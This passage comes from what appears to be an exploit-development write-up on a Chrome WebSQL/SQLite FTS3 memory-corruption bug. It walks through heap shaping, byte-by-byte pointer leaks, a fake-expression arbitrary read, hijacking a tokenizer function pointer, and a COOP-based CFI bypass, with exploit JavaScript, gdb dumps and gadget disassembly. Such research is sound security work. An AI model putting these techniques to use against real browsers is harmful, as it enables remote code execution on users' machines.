  /* xRollback     */ fts3RollbackMethod,
  /* xFindFunction */ fts3FindFunctionMethod,
  /* xRename */       fts3RenameMethod,
  /* xSavepoint    */ fts3SavepointMethod,
  /* xRelease      */ fts3ReleaseMethod,
  /* xRollbackTo   */ fts3RollbackToMethod,
};

static int fts3CreateMethod(
  sqlite3 *db,                    /* Database connection */
  void *pAux,                     /* Pointer to tokenizer hash table */
  int argc,                       /* Number of elements in argv array */
  const char * const *argv,       /* xCreate/xConnect argument array */
  sqlite3_vtab **ppVtab,          /* OUT: New sqlite3_vtab object */
  char **pzErr                    /* OUT: sqlite3_malloc'd error message */
){
  return fts3InitVtab(1, db, pAux, argc, argv, ppVtab, pzErr);
}

static int fts3InitVtab(
  int isCreate,                   /* True for xCreate, false for xConnect */
  sqlite3 *db,                    /* The SQLite database connection */
  void *pAux,                     /* Hash table containing tokenizers */
  int argc,                       /* Number of elements in argv array */
  const char * const *argv,       /* xCreate/xConnect argument array */
  sqlite3_vtab **ppVTab,          /* Write the resulting vtab structure here */
  char **pzErr                    /* Write any error message here */
){
  Fts3Hash *pHash = (Fts3Hash *)pAux;
  Fts3Table *p = 0;               /* Pointer to allocated vtab */
  int rc = SQLITE_OK;             /* Return code */

  // snipped for brevity

  nByte = sizeof(Fts3Table) +                  /* Fts3Table */
          nCol * sizeof(char *) +              /* azColumn */
          nIndex * sizeof(struct Fts3Index) +  /* aIndex */
          nCol * sizeof(u8) +                  /* abNotindexed */
          nName +                              /* zName */
          nDb +                                /* zDb */
          nString;                             /* Space for azColumn strings */
  p = (Fts3Table*)sqlite3_malloc(nByte);
  if( p==0 ){
    rc = SQLITE_NOMEM;
    goto fts3_init_out;
  }
  memset(p, 0, nByte);
  p->db = db;
  p->nColumn = nCol;
  p->nPendingData = 0;
  p->azColumn = (char **)&p[1];
  p->pTokenizer = pTokenizer;
  p->nMaxPendingData = FTS3_MAX_PENDING_DATA;
  p->bHasDocsize = (isFts4 && bNoDocsize==0);
  p->bHasStat = (u8)isFts4;
  p->bFts4 = (u8)isFts4;
  p->bDescIdx = (u8)bDescIdx;
  p->nAutoincrmerge = 0xff;   /* 0xff means setting unknown */
  p->zContentTbl = zContent;
  p->zLanguageid = zLanguageid;

  // snipped for brevity

  /* Fill in the azColumn array */
  for(iCol=0; iCol<nCol; iCol++){
    char *z;
    int n = 0;
    z = (char *)sqlite3Fts3NextToken(aCol[iCol], &n);
    if( n>0 ){
      memcpy(zCsr, z, n);
    }
    zCsr[n] = '\0';
    sqlite3Fts3Dequote(zCsr);
    p->azColumn[iCol] = zCsr;
    zCsr += n+1;
    assert( zCsr <= &((char *)p)[nByte] );
  }

  // snipped for brevity
}

/*
** A connection to a fulltext index is an instance of the following
** structure. The xCreate and xConnect methods create an instance
** of this structure and xDestroy and xDisconnect free that instance.
** All other methods receive a pointer to the structure as one of their
** arguments.
*/
struct Fts3Table {
  sqlite3_vtab base;              /* Base class used by SQLite core */
  sqlite3 *db;                    /* The database connection */
  const char *zDb;                /* logical database name */
  const char *zName;              /* virtual table name */
  int nColumn;                    /* number of named columns in virtual table */
  char **azColumn;                /* column names.  malloced */
  u8 *abNotindexed;               /* True for 'notindexed' columns */
  sqlite3_tokenizer *pTokenizer;  /* tokenizer for inserts and queries */
  char *zContentTbl;              /* content=xxx option, or NULL */
  char *zLanguageid;              /* languageid=xxx option, or NULL */
  int nAutoincrmerge;             /* Value configured by 'automerge' */
  u32 nLeafAdd;                   /* Number of leaf blocks added this trans */

  /* Precompiled statements used by the implementation. Each of these
  ** statements is run and reset within a single virtual table API call.
  */
  sqlite3_stmt *aStmt[40];
  sqlite3_stmt *pSeekStmt;        /* Cache for fts3CursorSeekStmt() */

  char *zReadExprlist;
  char *zWriteExprlist;

  int nNodeSize;                  /* Soft limit for node size */
  u8 bFts4;                       /* True for FTS4, false for FTS3 */
  u8 bHasStat;                    /* True if %_stat table exists (2==unknown) */
  u8 bHasDocsize;                 /* True if %_docsize table exists */
  u8 bDescIdx;                    /* True if doclists are in reverse order */
  u8 bIgnoreSavepoint;            /* True to ignore xSavepoint invocations */
  int nPgsz;                      /* Page size for host database */
  char *zSegmentsTbl;             /* Name of %_segments table */
  sqlite3_blob *pSegments;        /* Blob handle open on %_segments table */

  int nIndex;                     /* Size of aIndex[] */
  struct Fts3Index {
    int nPrefix;                  /* Prefix length (0 for main terms index) */
    Fts3Hash hPending;            /* Pending terms table for this index */
  } *aIndex;
  int nMaxPendingData;            /* Max pending data before flush to disk */
  int nPendingData;               /* Current bytes of pending data */
  sqlite_int64 iPrevDocid;        /* Docid of most recently inserted document */
  int iPrevLangid;                /* Langid of recently inserted document */
  int bPrevDelete;                /* True if last operation was a delete */
};

struct sqlite3_vtab {
  const sqlite3_module *pModule;  /* The module for this virtual table */
  int nRef;                       /* Number of open cursors */
  char *zErrMsg;                  /* Error message from sqlite3_mprintf() */
  /* Virtual table implementations will typically add additional fields */
};

There are several things noteworthy in this function. First, the Fts3Table object is dynamically sized. It is sized to encompass all of the column names, which gets stored in the object itself. Because column names are user controlled, the entire size of the Fts3Table is user controlled. This means that we can place an Fts3Table chunk into an arbitrary size-class freelist of our choosing. Next, there is a member, azColumn which points somewhere inside the object itself. If this value can be leaked, it can be used to calculate the object’s address. Next, there is a member called base. This base member is a struct, which has another member called pModule. This pModule member points within the .data section of the SQLite library. By leaking this address, it is possible to bypass ASLR. Finally, there is member called db. This points to an sqlite3 object, which is allocated when the WebSQL database is first opened. This occurs very early in the stage of exploitation, so we can expect that this object will be somewhere in the beginning of the heap. All of these object fields will be utilized later on during exploitation.

For now, we just want this Fts3Table object to be allocated as the third chunk. As mentioned above, since the column name actually goes into the Fts3table object, the size is completely controlled so we can make it use the 0x1000 size freelist. However, there is one thing to keep in mind. That is, before this chunk is created, a Table object is also created (because an fts3 table is also just a regular table) before the Fts3Table object is created. What this means is that the column name will actually be stored in 2 places. This will create 2 0x1000 chunks, which is undesirable. To get around this issue, we need the column name of the Table object to use a freelist other than the 0x1000 freelist. The boundary of a chunk being placed in a 0x1000 freelist is 0xD00. Any chunk smaller than that will be placed in the 0xD00 freelist. Therefore, we can create an fts3 table with a column that is smaller than 0xD00, and that column name will be take a chunk from the 0xD00 freelist. On the other hand, the combined size of the Fts3Table object calculated above in line 53 would be bigger than 0xD00, making it grab a chunk from the 0x1000 freelist. Problem solved. Now the Fts3Table object can be nicely placed in the third chunk.

The following illustration is what happens next in Stage 8.

Now we know the 1st, 2nd, and 3rd byte of the second chunk’s address. We will not bruteforce the 4th byte just yet, because there is a risk of hitting unmapped memory when bruteforcing it without knowing the byte’s range. Instead, we will proceed to leak the 5th, and 6th byte in Stage 9.

Stage 9

There are a total of 8 bytes that constitute an address, but for the purpose of leaking, we only need to leak 6 of them. This is because the heap grows upwards from the lowest address, and the heap would have to grow several hundred gigabytes in order to make the 7th byte of the address flip from 0 to 1. In stage 9, the 5th and 6th byte will be leaked one at a time. The way it is leaked is different from Stage 8. This time, it is not possible to bruteforce the byte, because setting the byte to an arbitrary value will make SQLite hit unmapped memory when it tries to access the column name. Therefore, the bytes have to be exactly leaked, using a different method. This is made possible by actually reading out the bytes as column names.

This was actually not possible until the 3 bytes of the second chunk were leaked in Stage 8. Armed with knowledge of the 3 bytes, we can cook up this kind of scenario.

There are a couple things to mention before progressing. First, it was surprising that SQLite would accept everything as a column name, including spaces, newlines, and special characters. All that was needed to make it work was to surround the entire column name with quotes. However, checking the existence of the column is not as simple as issuing a SELECT statement. For some reason, the tokenizer that handles the SELECT statement would eat all the column names between the quotes, and treat it like an *. Testing other different queries, we came across INSERT. By surrounding the column name with a parenthesis and quotes, it was possible to test if certain column names existed, even if the column name included whitespaces and special characters.

All of this seems perfect, and it also gives rise to another question. Why not just leak all bytes using this method? Unfortunately, things are slightly more complicated.
The biggest problem with this method is, that it is only possible to leak bytes that fall into the ascii range. In the above illustration, the 6th byte is okay and will be leaked without issues. However, the 5th byte falls outside the ASCII range, and will not be leaked. The reason for this is that when we issue an SQL statement, if there are any characters in a column name above the \x80 range, then SQLite will treat the characters as Unicode and internally convert them to UTF-8. It is the converted UTF-8 values that will be memcmp’d byte by byte with what the column name that resides in memory. For instance, if we ping for a column “\xC0”, then SQLite will convert that into UTF-8 form “\xC3\x80”, and “\xC3\x80” will be compared to what lies in memory. Only if the two matches, then SQLite will deem that the column exists. This brings up a serious problem where bytes can be leaked with an only a 50% success rate. However, as luck would have it, the 6th byte is always within the ASCII range. This is because as explained earlier, it would take several dozen GB’s of spray to make the 6th byte flip above 0x80. Therefore, there is no issue with the 6th byte. The problem is the 5th byte.

It would be sad to say that we would have to live with the 5th byte issue, and pray to god that it falls within that range. However, all things can be fixed. The following illustrates how to fix this issue.

Technically, the memcpy isn’t actually copying backwards. It’s just starting from a lower offset than 0x7FFFFFFF, such as 0x7FFFFFF0, and then copying all the way up to 0x80000000.
With this, it is possible to leak almost any byte, by constructing a unicode lookup table. Constructing this table requires quite some time and effort, so it was not specifically implemented in the exploit, but this would be the right way to correct this issue. Also, since the unicode library used by SQLite does not do a 1-on-1 matching on all Unicode characters, but rather translates them programatically, there could be cool ways to abuse the Unicode engine to produce a sequence of bytes that could be looked up easily, without having to construct a full blown table. This is left as an exercise for the interested reader. In the exploit, it tests the 5th byte and if it falls outside the ASCII range, it prints that the exploit should be run again by fully closing chrome and reopening it, to get a better 5th byte value.

After this stage, the exploit can finally start bruteforcing the 4th byte.
Based on the values that were leaked from the topmost bytes, the exploit runs a series of heuristics to guess the start value for bruteforcing, so that it falls within a mapped region, as well as making sure that the value is lower than the actual byte to be leaked. The actual heuristics would look as follows.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
    if(fts3_azColumn_leaked_byte_count >= 3){
        console.log(`Truncate it on purpose. We're still gonna brute the 4th byte because we don't know whether the leaked 4th byte is case insensitive and hence, inaccurate`);

        fts3_azColumn_leaked_value = (fts3_azColumn_leaked_value / Math.pow(0x100, fts3_azColumn_leaked_byte_count - 3)) >>> 0;
        fts3_azColumn_leaked_byte_count = 3;

        console.log(`Case 0`);
        leak_base_address = fts3_azColumn_leaked_value * 0x1000000;
        leak_base_address -= 0x20000000;
        leak_base_address += B_0x1000_offset_3bytes;
    }
    else{
        if((fts3_azColumn_leaked_byte_count == 2) &&
                (fts3_zWriteExprlist_leaked_byte_count > 2)
               ){
            console.log(`Case 1`);
            leak_base_address = fts3_azColumn_leaked_value * 0x100000000;
            leak_base_address += 0x80 * 0x1000000;
            leak_base_address += B_0x1000_offset_3bytes;
        }
        else if((fts3_azColumn_leaked_byte_count == 2) &&
                (fts3_zWriteExprlist_leaked_byte_count == 2) &&
                (fts3_azColumn_leaked_value_second_byte == (fts3_zWriteExprlist_leaked_value_second_byte + 1))){
            console.log(`Case 2`);
            leak_base_address = fts3_azColumn_leaked_value * 0x100000000;
            leak_base_address += B_0x1000_offset_3bytes;
        }
        else if((fts3_azColumn_leaked_byte_count == 2) &&
                (fts3_zWriteExprlist_leaked_byte_count == 2) &&
                (fts3_azColumn_leaked_value_second_byte == fts3_zWriteExprlist_leaked_value_second_byte)
               ){
            console.log(`Case 3`);
            // Very wierd case. Only happened once...? Just gamble on the address here. Might not work.
            leak_base_address = fts3_azColumn_leaked_value * 0x100000000;
            leak_base_address += 0x80 * 0x1000000;
            leak_base_address += B_0x1000_offset_3bytes;
        }
        else{
            console.log(`Don't know how to handle this case. Stopping here...`);
            return;
        }
    }

This would handle all cases. Afterwards, the same logic in Stage 8 is applied to bruteforce the 4th byte. Now all 6 bytes of the address have been leaked. It’s time to proceed to Stage 10 and create an AAR.

Stage 10

If we can’t leak exact values from column names because of the unicode restriction, then how is it possible to create an AAR?

For this, we are going to use another field in the Column object that hasn’t been covered in detail, which is the Default Value. It is possible to set a default value using the following SQL statement.

CREATE TABLE TABLE_NAME (col1 DEFAULT default_value);

As a reminder, the following is the definition of the Column object.

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
** information about each column of an SQL table is held in an instance
** of this structure.
*/
struct Column {
  char *zName;     /* Name of this column, \000, then the type */
  Expr *pDflt;     /* Default value of this column */
  char *zColl;     /* Collating sequence.  If NULL, use the default */
  u8 notNull;      /* An OE_ code for handling a NOT NULL constraint */
  char affinity;   /* One of the SQLITE_AFF_... values */
  u8 szEst;        /* Estimated size of value in this column. sizeof(INT)==1 */
  u8 colFlags;     /* Boolean properties.  See COLFLAG_ defines below */
};

These Default Values get stored in pDflt field of the Column object. They are not just stored as a stream of bytes, but they are stored in what SQLite calls an Expression Tree. Expressions represent part of the SQL statement, usually the part in the end such as the WHERE clause. This is the part of an SQL query which is user configurable, where the user could add different kinds of keywords and statements so that the SQL query would react differently based on the entire statement. The entire expression is represented as a tree, so SQLite can process it in a recursive manner. The default value specified in the end of the CREATE TABLE statement is also treated as part of the expression, and is stored within the tree. Let’s look at the definition of the Expr structure.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
struct Expr {
  u8 op;                 /* Operation performed by this node */
  char affinity;         /* The affinity of the column or 0 if not a column */
  u32 flags;             /* Various flags.  EP_* See below */
  union {
    char *zToken;          /* Token value. Zero terminated and dequoted */
    int iValue;            /* Non-negative integer value if EP_IntValue */
  } u;

  /* If the EP_TokenOnly flag is set in the Expr.flags mask, then no
  ** space is allocated for the fields below this point. An attempt to
  ** access them will result in a segfault or malfunction.
  *********************************************************************/


  Expr *pLeft;           /* Left subnode */
  Expr *pRight;          /* Right subnode */

  //snipped for brevity
}

Like any other tree, it has a left and right node pointer, and it has certain flags and a pointer that points to the actual node data. Let’s see how a default value looks in memory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
sqlite> CREATE TABLE t1(c1 INTEGER DEFAULT 0x1337);

(gdb) p *(Table*)0x74b568
$23 = {
  zName = 0x728d08 "t1",
  aCol = 0x74ac38,
  pIndex = 0x0,
  pSelect = 0x0,
  pFKey = 0x0,
  zColAff = 0x0,
  pCheck = 0x0,
  tnum = 2,
  nTabRef = 1,
  tabFlags = 0,
  iPKey = -1,
  nCol = 1,
  nRowLogEst = 200,
  szTabRow = 30,
  keyConf = 0 '\000',
  addColOffset = 41,
  nModuleArg = 0,
  azModuleArg = 0x0,
  pVTable = 0x0,
  pTrigger = 0x0,
  pSchema = 0x72aa48,
  pNextZombie = 0x0
}

(gdb) p *(Column*)0x74ac38
$24 = {
  zName = 0x74b5f8 "c1",
  pDflt = 0x74b688,
  zColl = 0x0,
  notNull = 0 '\000',
  affinity = 68 'D',
  szEst = 1 '\001',
  colFlags = 4 '\004'
}

(gdb) p *(Expr*)0x74b688
$25 = {
  op = 169 '\251',
  affinity = 0 '\000',
  flags = 12288,
  u = {
    zToken = 0x74b6b4 "0x1337",
    iValue = 7648948
  },
  pLeft = 0x74b6c0,
  pRight = 0x0,
  x = {
    pList = 0x0,
    pSelect = 0x0
  },
  nHeight = 0,
  iTable = 858880048,
  iColumn = 14131,
  iAgg = -256,
  iRightJoinTable = 0,
  op2 = 0 '\000',
  pAggInfo = 0x80c4000000008f,
  pTab = 0x1337,
  pWin = 0x0
}

(gdb) p *(Expr*)0x74b6c0
$26 = {
  op = 143 '\217',
  affinity = 0 '\000',
  flags = 8438784,
  u = {
    zToken = 0x1337 <error: Cannot access memory at address 0x1337>,
    iValue = 4919
  },
}

This might seem a little complicated at first glance. The only thing important in the Expr object is the opcode, the flags, and the zToken. Here is how the above series of objects would look in a more graphical fashion.

Here is what we want to achieve, in order to gain AAR.

We would create a fake Expr object. The Expr object would represent a leaf node (EP_TokenOnly | EP_Leaf) so SQLite won’t go looking into the pLeft and pRight members, and the node will be set to a static node (EP_Static) so that SQLite won’t free the zToken member when it’s about to dispose the Expression tree. Then, the opcode will be set to OP_String, so that SQLite will treat the address that zToken points to as a NULL terminated string.

The next question is where are we going to write this fake Expr object?
This brings up the requirement issue that was presented on Stage 8. The reason why we wanted to have the three chunks in order is because we could assume that the column object array (the first chunk) is placed right before leaked second chunk. By having the objects laid out that way, writing arbitrary data that represents the fake Expr object, and retrieving the object’s address is instantly solved. This is depicted in the following pictures.

This explains why the precondition in Stage 8 was required. However, we should at least discuss how this requirement can be eliminated, because having the 3 chunks allocated sequentially is the least reliable part of the entire exploit, and it would be nice if there was a way to avoid it. In order to get rid of the requirement, the following steps can be taken.

  1. On the beginning of Stage 8, allocate a bunch of 0x2000 chunks. Then deallocate one of the 0x2000 chunks in the middle.
  2. Drop the table that holds the 0x1000 chunk, and allocate a column array with 104 column names. The corrupted column index will allocate a column name of size 0x2000. This will place the column object array back in it’s 0x1000 place, and place the 0x2000 column name into the hole that was created in step 1.
  3. Execute Stage 8 to leak the lower 3 bytes of the 0x2000 chunk address.
  4. Corrupt the column name address so that it points to the the next 0x2000 chunk.
  5. Use the INSERT statement to find which table is responsible for that chunk.
  6. Drop that table. Place the Fts3Table chunk there.
  7. Corrupt the column name address so that it points to the 0x2000 chunk that’s after the Fts3Table.
  8. Use the INSERT statement to find which table is responsible for that chunk.
  9. Drop that table. Place a 0x2000 chunk with arbitrary data on there, that could be used for the fake Expr object.
  10. Now we have 3 chunks allocated sequentially, and the address of all three chunks are known.

This is far more reliable and precise than the “Pray that the three 0x1000 chunks are next to each other” method. The only problem is to find a primitive which the user can allocate an arbitrary sized chunk with attacker controlled data. This can not be done with column names because of the UTF-8 conversion. How to find such primitive will be discussed in the end of the blog post, in the “Increasing Speed and Reliability” section.

Now back to the Expr objects. The final question is how the fake Default Value object could be used to read data from an arbitrary address. After all, only the default value has been set, and SQLite has no way to read the default value out of the table.

This is true and not true. It is impossible to issue a query to read the default value that was set by the CREATE TABLE statement. However, it is possible to indirectly read it. The logic behind it is simple.

We INSERT into the corrupted table a single value using an innocent column, and let SQLite write the default value of the corrupted column into the table. What SQLite does under the hood is, it goes through each column in the Column Object array and checks if any of the column objects have the Default Value Expression tree set. If it is 0, then SQLite fills that column’s data in the new row with NULL. If it actually sees some address, then it follows the expression tree and parses it. SQLite sees our fake Expr object, and it sees that it’s a leaf node. It looks at the column opcode and sees OP_STRING. Therefore, it treats the node value as a string address, and it grabs the NULL terminated string from the address, and uses that to fill the the new row’s column data. Since SQLite does all of this itself, there is no UTF-8 conversion involved, and the value is simply treated as a NULL terminated string, and copied as-is.
Later, we can SELECT that value from the table, and read it back out. Since the column type of the corrupted column is set to BLOB, sqlite will treat the underlying value as a series of hex bytes and return it to the user. For the user to actually see the data in it’s original form, the result data can be passed through the hex() or the quote() function, so that the hex bytes will be converted to a series of ascii characters that represent the hex data.

This is how an AAR is constructed. We indirectly read the data by INSERTing, and then SELECTing. Since the AAR can only read strings up to a NULL byte, all data is read one byte at a time, and the resulting bytes are all combined into an array where it can later be processed. Using this, it is possible to leak all data on the Fts3Table object, including the very first member. This bypasses ASLR. We are going to further abuse this AAR to read more interesting things.

Stage 11

Now the final problem is how to control $RIP.

The current situation is that AAR is achieved, but AAW isn’t. Therefore, in order to skip AAW, it would be desirable to find a code execution primitive in one of the objects that we can OOB write. In the current heap layout, the only object that has potentially interesting fields which lies in the boundaries of the OOB write is the third chunk, which is the Fts3Table object. Remember this?

That is the object we want to corrupt. We can start from the first chunk which is the topmost chunk in the above picture, OOB write while protecting the column array data all the way to the end of the first chunk, then all the way to the end of the second chunk, and start corrupting fields in the Fts3Table object. Now the question is if there is any interesting field that would lead to code execution.

After scavenging through the fts3 Virtual Table Methods, we came across this function.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
static const sqlite3_module fts3Module = {
  /* iVersion      */ 2,
  /* xCreate       */ fts3CreateMethod,
  /* xConnect      */ fts3ConnectMethod,
  /* xBestIndex    */ fts3BestIndexMethod,
  /* xDisconnect   */ fts3DisconnectMethod,
  /* xDestroy      */ fts3DestroyMethod,
  /* xOpen         */ fts3OpenMethod,
  /* xClose        */ fts3CloseMethod,
  /* xFilter       */ fts3FilterMethod,
  /* xNext         */ fts3NextMethod,
  /* xEof          */ fts3EofMethod,
  /* xColumn       */ fts3ColumnMethod,
  /* xRowid        */ fts3RowidMethod,
  /* xUpdate       */ fts3UpdateMethod,
  /* xBegin        */ fts3BeginMethod,
  /* xSync         */ fts3SyncMethod,
  /* xCommit       */ fts3CommitMethod,
  /* xRollback     */ fts3RollbackMethod,
  /* xFindFunction */ fts3FindFunctionMethod,
  /* xRename */       fts3RenameMethod,
  /* xSavepoint    */ fts3SavepointMethod,
  /* xRelease      */ fts3ReleaseMethod,
  /* xRollbackTo   */ fts3RollbackToMethod,
};

/*
** The xDisconnect() virtual table method.
*/
static int fts3DisconnectMethod(sqlite3_vtab *pVtab){
  Fts3Table *p = (Fts3Table *)pVtab;
  int i;

  assert( p->nPendingData==0 );
  assert( p->pSegments==0 );

  /* Free any prepared statements held */
  sqlite3_finalize(p->pSeekStmt);
  for(i=0; i<SizeofArray(p->aStmt); i++){
    sqlite3_finalize(p->aStmt[i]);
  }
  sqlite3_free(p->zSegmentsTbl);
  sqlite3_free(p->zReadExprlist);
  sqlite3_free(p->zWriteExprlist);
  sqlite3_free(p->zContentTbl);
  sqlite3_free(p->zLanguageid);

  /* Invoke the tokenizer destructor to free the tokenizer. */
  p->pTokenizer->pModule->xDestroy(p->pTokenizer);

  sqlite3_free(p);
  return SQLITE_OK;
}

The line of importance is highlighted. p->pTokenizer is a field within the Fts3Table object. It’s 0x48 offset away from the beginning. The function reads that field, dereferences it a couple times and uses the final value as a function pointer. This is a perfect code control primitive. In assembly, line 49 looks like this.

1
2
3
4
mov     rdi, [r12+48h]
mov     rax, [rdi]
mov     rcx, [rax+10h]
call    rcx

So what we’re trying to achieve looks like the following.

After finding the primitive, payload was constructed to control $RIP. This was built for the debug compile build of Chromium. After that, the exploit was ported to the vulnerable Chrome stable version (v70.0.3538.77). While porting it, a peculiar happened. $RIP would no longer be controlled, but would jump to a UD2 instruction instead. At first, it was thought that some kind of custom exception handler logic was in play and was snatching the SIGSEGV, but it turned out to be something else. We observed the program right before $RIP was controlled, and realized that the above assembly has changed, and had additional logic on the release build. It looked like the following.

1
2
3
4
5
6
7
8
9
10
11
12
.text:0000000004C040A4                 mov     rdi, [r12+48h]
.text:0000000004C040A9                 mov     rax, [rdi]
.text:0000000004C040AC                 mov     rcx, [rax+10h]
.text:0000000004C040B0                 lea     r14, loc_19C17F0
.text:0000000004C040B7                 mov     rax, rcx
.text:0000000004C040BA                 sub     rax, r14
.text:0000000004C040BD                 ror     rax, 3
.text:0000000004C040C1                 cmp     rax, 104h
.text:0000000004C040C7                 ja      loc_4C041C1
.text:0000000004C040CD                 call    rcx
.text:0000000004C041C1 loc_4C041C1:                            ; CODE XREF: sub_4C03B40+7C↑j
.text:0000000004C041C1                 ud2

This was obviously some kind of Control Flow Integrity logic. The program was checking if the call destination was in a certain range, and if it wasn’t, it would ruthlessly jump to UD2, terminating the process.
This was interesting, because there was no mention about CFI being enabled on Windows builds, so it was interesting to encounter a CFI implementation on Linux. In fact, there is actually a page in the Chromium website that explains about the CFI, and it states the CFI is currently only implemented in Linux and slated to be released on other platforms some time in the future. All of this is great but what this means for an exploiter is that the CFI would have to be bypassed.

The go-to way to bypass CFI is to achieve AAR/AAW before getting code execution, and work forwards from there. Right now, we only have AAR and no AAW. The first idea to achieve AAW was to manipulate the Expression trees representing the Default Value of a Column object. This is because during the course of experimenting with fake Expr objects, playing with various flags and values led to all kinds of interesting crashes. So conjuring an AAW by creating the right sequence of Expression nodes was one way to deal with it. However, this required another deep dive into how SQLite handles expression trees, and a scavenge through the source code of all of the opcodes, and the accompanying functions.

What we decided to use instead, were the artifacts lying right in front of us. The list of functions that the CFI allowed to call.

For CFI checks on other parts of the code, the function list that CFI permits is very narrow.

1
2
3
4
5
6
7
8
.text:0000000004C04BB5                 mov     [rbp-50h], rax
.text:0000000004C04BB9                 mov     rbx, [rax+18h]
.text:0000000004C04BBD                 mov     rax, rbx
.text:0000000004C04BC0                 lea     rcx, loc_19B76B0
.text:0000000004C04BC7                 sub     rax, rcx
.text:0000000004C04BCA                 ror     rax, 3
.text:0000000004C04BCE                 cmp     rax, 8
.text:0000000004C04BD2                 ja      loc_4C06207

In this case, CFI only allows to jump to 8 functions that is predefined in a jump table.
However, in our case, we had a choice of 260 functions to jump to.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
.text:0000000004C040A4                 mov     rdi, [r12+48h]
.text:0000000004C040A9                 mov     rax, [rdi]
.text:0000000004C040AC                 mov     rcx, [rax+10h]
.text:0000000004C040B0                 lea     r14, loc_19C17F0
.text:0000000004C040B7                 mov     rax, rcx
.text:0000000004C040BA                 sub     rax, r14
.text:0000000004C040BD                 ror     rax, 3
.text:0000000004C040C1                 cmp     rax, 104h
.text:0000000004C040C7                 ja      loc_4C041C1
.text:0000000004C040CD                 call    rcx
.text:0000000004C041C1 loc_4C041C1:                            ; CODE XREF: sub_4C03B40+7C↑j
.text:0000000004C041C1                 ud2


.text:00000000019C17F0 loc_19C17F0:                            ; DATA XREF: sub_1E78120+1C2↓o
.text:00000000019C17F0                 jmp     loc_4B30FE0
.text:00000000019C17F0 ; ---------------------------------------------------------------------------
.text:00000000019C17F5                 align 8
.text:00000000019C17F8                 jmp     loc_4B31AC0
.text:00000000019C17F8 ; ---------------------------------------------------------------------------
.text:00000000019C17FD                 align 20h
.text:00000000019C1800                 jmp     loc_4B390E0
.text:00000000019C1800 ; ---------------------------------------------------------------------------
.text:00000000019C1805                 align 8
.text:00000000019C1808                 jmp     loc_4B19720
.text:00000000019C1808 ; ---------------------------------------------------------------------------
.text:00000000019C180D                 align 10h
.text:00000000019C1810                 jmp     loc_4B194F0
.text:00000000019C1810 ; ---------------------------------------------------------------------------
.text:00000000019C1815                 align 8
.text:00000000019C1818                 jmp     loc_4B34B50
.text:00000000019C1818 ; ---------------------------------------------------------------------------
.text:00000000019C181D                 align 20h
.text:00000000019C1820                 jmp     loc_4B196F0
.text:00000000019C1820 ; ---------------------------------------------------------------------------
.text:00000000019C1825                 align 8
.text:00000000019C1828                 jmp     loc_4B19720
.text:00000000019C1828 ; ---------------------------------------------------------------------------
.text:00000000019C182D                 align 10h
.text:00000000019C1830                 jmp     loc_4B32DB0
.text:00000000019C1830 ; ---------------------------------------------------------------------------
.text:00000000019C1835                 align 8
.text:00000000019C1838                 jmp     loc_4B31AE0
.text:00000000019C1838 ; ---------------------------------------------------------------------------
.text:00000000019C183D                 align 20h
.text:00000000019C1840                 jmp     loc_4B196F0
...
...
...

That is a lot of functions. With this big list of a function, we just might be able to find a function that matches a certain criteria, that would aid in exploitation. This kind of calling into functions that the CFI allows is called Counterfeit Object Oriented Programming (COOP). It’s actually a term coined by the academia, and is used to describe constructing turing complete ROP gadget sets using only functions that the CFI allows. In essence, it is a generic CFI bypass technique, provided there is a long enough list of functions to choose from. In the paper, they call each of the CFI compliant functions a vfgadget. We will use this term in the remainder of the blogpost, because it’s a short term that could abbreviate “CFI compliant function gadget”. In the paper, the goal is trying to create a turing complete set of vfgadgets, by finding various vfgadgets that serve different purposes. The most important of these gadgets would be the Main Loop Vfgadget. But for our purposes, it is not required to find all of these vfgadgets. We only need to find exactly 1, because AAR is already achieved. The reason for this will be explained in the following section.

There are actually 2 ways to abuse COOP. Both of them will be discussed in the following sections.

Bypassing CFI by gaining AAW

The first way to bypass CFI is to construct an AAW with one of the vfgadgets. What we looked for was a function of this type.

1
2
3
4
5
6
7
8
test_function(){
...

void *a = this->field1;
a->testfield = this->field2;

...
}

The goal was to call a vfgadget of the above form, and gain AAW. The function did not have to look exactly like the above listing, but anything that would lead to AAW would work. While scavenging through the list of vfgadgets, several functions were found that matched the criteria. However, most of the functions were of this form.

1
2
3
4
5
6
7
8
9
10
11
12
test_function(){
...
// A looooooooooooot of things going on here.
...

void *a = this->field1;
a->testfield = this->field2;

...
// A lot more things.
...
}

Before and after our AAW primitive was triggered, there was an abundance of code executed. Because all code within the function uses the this pointer, which points to our ROP payload, there were so many reasons for the program to crash if care wasn’t taken to build a proper fake object that passed all the pointer dereferencing and conditional checks. Therefore, it was desirable to find a vfgadget that was a lot shorter, but still achieved the goal. After an hour of scavenging, we came across this vfgadget.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
.text:000000000404C690 sub_404C690     proc near               ; CODE XREF: .text:loc_19C1B60↑j
.text:000000000404C690                 mov     rcx, [rdi+18h]  ; 0x18 => 0x800
.text:000000000404C694                 movsxd  rdx, dword ptr [rcx+0Ch] ; dword 0x80C => 0
.text:000000000404C698                 xor     eax, eax
.text:000000000404C69A                 cmp     edx, [rcx+8]    ; dword 0x808 => 1
.text:000000000404C69D                 jge     short locret_404C6D2
.text:000000000404C69F                 mov     rax, [rcx]      ; 0x800 => 0x810
.text:000000000404C6A2                 shl     rdx, 4
.text:000000000404C6A6                 mov     rax, [rax+rdx]  ; 0x810 => Stack Pivot Gadget
.text:000000000404C6AA                 mov     rdx, [rdi+28h]  ; 0x28 => ret addr
.text:000000000404C6AE                 mov     [rdx], rax
.text:000000000404C6B1                 mov     rax, [rcx]
.text:000000000404C6B4                 movsxd  rdx, dword ptr [rcx+0Ch]
